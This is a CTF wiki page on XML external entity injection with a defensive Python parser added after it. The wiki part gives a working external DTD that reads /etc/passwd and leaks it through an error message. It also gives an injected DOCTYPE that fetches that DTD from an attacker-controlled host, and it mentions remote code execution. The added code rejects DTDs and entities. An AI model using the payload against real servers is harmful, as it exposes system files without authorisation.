.xml - adeptex/CTF GitHub Wiki

XXE Injection

XXE injection allows reading arbitrary files and sometimes RCE (if expect:// is enabled in PHP). Place a DTD file on your server and call it remotely from the XXE payload in the vulnerable application.

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

Save the ext.dtd file on a VPS

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Inject into vulnerable app

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>
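
Defensive counterpart, as an added example that is not part of the original wiki page: both stages above depend on the parser accepting a DOCTYPE, so a parser that refuses any DTD stops the chain before ext.dtd is ever requested. The sketch uses Python's standard-library expat bindings; the names `parse_untrusted`, `ForbiddenXML` and `is_rejected` are hypothetical, and the benign sample is constructed.

```python
import xml.parsers.expat

class ForbiddenXML(ValueError):
    """Document declares a DTD, an entity, or an external reference."""

def parse_untrusted(xml_bytes):
    """Return element names in document order; raise ForbiddenXML on any DTD use."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE", before any entity in the subset is processed.
        raise ForbiddenXML(f"DOCTYPE not allowed (root={name!r}, system={sysid!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration not allowed: {name!r}")

    def on_external_ref(context, base, sysid, pubid):
        raise ForbiddenXML(f"external entity not allowed: {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl          # defence in depth
    parser.ExternalEntityRefHandler = on_external_ref  # defence in depth
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(xml_bytes, True)
    return elements

# The document from "Inject into vulnerable app" above, reused as test input.
INJECTED = b"""<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>"""

# Constructed benign input with no DOCTYPE.
BENIGN = b"<message><to>ops</to><body>hello</body></message>"

def is_rejected(xml_bytes):
    """True if parse_untrusted refuses the document because of DTD use."""
    try:
        parse_untrusted(xml_bytes)
    except ForbiddenXML:
        return True
    return False

if __name__ == "__main__":
    print(parse_untrusted(BENIGN))
    print(is_rejected(INJECTED))
```

Malformed XML still raises `xml.parsers.expat.ExpatError`, so callers should treat both exception types as a rejected request.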